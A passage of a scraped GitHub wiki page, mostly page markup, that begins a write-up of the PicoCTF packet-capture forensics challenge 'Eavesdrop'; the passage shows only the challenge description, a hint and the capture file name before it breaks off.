3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75A.75.75 0 0 1 .75 1h4.253c1.227 0 2.317.59 3 1.501A3.743 3.743 0 0 1 11.006 1h4.245a.75.75 0 0 1 .75.75v10.5a.75.75 0 0 1-.75.75h-4.507a2.25 2.25 0 0 0-1.591.659l-.622.621a.75.75 0 0 1-1.06 0l-.622-.621A2.25 2.25 0 0 0 5.258 13H.75a.75.75 0 0 1-.75-.75Zm7.251 10.324.004-5.073-.002-2.253A2.25 2.25 0 0 0 5.003 2.5H1.5v9h3.757a3.75 3.75 0 0 1 1.994.574ZM8.755 4.75l-.004 7.322a3.752 3.752 0 0 1 1.992-.572H14.5v-9h-3.495a2.25 2.25 0 0 0-2.25 2.25Z"></path></svg> <span>Wiki</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/not1cyyy/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Wiki Security Insights </details-menu></details></div></nav> </div> <turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " > <div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4 page" id="wiki-wrapper"> <div class="d-flex flex-column flex-md-row gh-header"> <h1 class="flex-auto min-width-0 mb-2 mb-md-0 mr-0 mr-md-2 gh-header-title">PicoCTF : Eavesdrop</h1> <div class="mt-0 mt-lg-1 flex-shrink-0 gh-header-actions"> Jump to bottom </div> </div> <div class="mt-2 mt-md-1 pb-3 gh-header-meta"> Firas Chaib edited this page <relative-time datetime="2022-04-16T16:02:15Z" class="no-wrap">Apr 16, 2022</relative-time> · 1 revision </div> <div id="wiki-content" class="mt-4"> <div data-view-component="true" class="Layout Layout--flowRow-until-md Layout--sidebarPosition-end Layout--sidebarPosition-flowRow-end"> <div data-view-component="true" class="Layout-sidebar"> <div class="wiki-rightbar"> <div id="wiki-pages-box" class="mb-4 wiki-pages-box js-wiki-pages-box" role="navigation"> <div class="Box Box--condensed color-shadow-small"> <div class="Box-header js-wiki-toggle-collapse" style="cursor: pointer"> <h3 class="Box-title"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toggle-display"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-right js-wiki-sidebar-toggle-display d-none"> <path d="m6.427 4.427 3.396 3.396a.25.25 0 0 1 0 .354l-3.396 3.396A.25.25 0 0 1 6 11.396V4.604a.25.25 0 0 1 .427-.177Z"></path></svg> Pages <span>14</span> </h3> </div> <div class=" js-wiki-sidebar-toggle-display"> <div class="filter-bar"> <input type="text" id="wiki-pages-filter" class="form-control input-sm input-block js-filterable-field" placeholder="Find a page…" aria-label="Find a page…"> </div> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Home</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Home/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> GDG Algiers CTF : franklin last words</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/GDG-Algiers-CTF-:-franklin-last-words/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PatriotCTF : Banner</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PatriotCTF-:-Banner/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PatriotCTF : CoruptAAAAd</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PatriotCTF-:-CoruptAAAAd/_toc"> </include-fragment></details> <details class="details-reset" open> <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron js-wiki-sidebar-toc-toggle-chevron-open mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Eavesdrop</span> </div> </summary> Description Files Solution Recon Execution Flag </details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Operation Oni</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Operation-Oni/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Sleuthkit Apprentice</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Sleuthkit-Apprentice/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : st3g0</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-st3g0/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Transposition Trial</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Transposition-Trial/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Easy Crypto Challenge</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Easy-Crypto-Challenge/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Information Paradox</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Information-Paradox/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Invisible Stargate</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Invisible-Stargate/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Off The Grid</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Off-The-Grid/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Strange Traffic</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Strange-Traffic/_toc"> </include-fragment></details> </div></div> </div> <h5 class="mt-0 mb-2">Clone this wiki locally</h5> <div class="width-full input-group"> <input id="wiki-clone-url" type="text" data-autoselect class="form-control input-sm text-small color-fg-muted input-monospace" aria-label="Clone URL for this wiki" value="https://github.com/not1cyyy/CTF-Writeups.wiki.git" readonly> <span> <clipboard-copy for="wiki-clone-url" aria-label="Copy to clipboard" data-view-component="true" class="btn btn-sm zeroclipboard-button"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg style="display: none;" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check color-fg-success"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg></clipboard-copy> </span> </div> </div></div> <div data-view-component="true" class="Layout-main"> <div id="wiki-body" class="gollum-markdown-content"> <div class="markdown-body"> <h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Description</h1>Download this packet capture and find the flag.Hint : All we know is that this packet capture includes a chat conversation and a file transfer.<h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Files</h2>capture.flag.pcap<h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 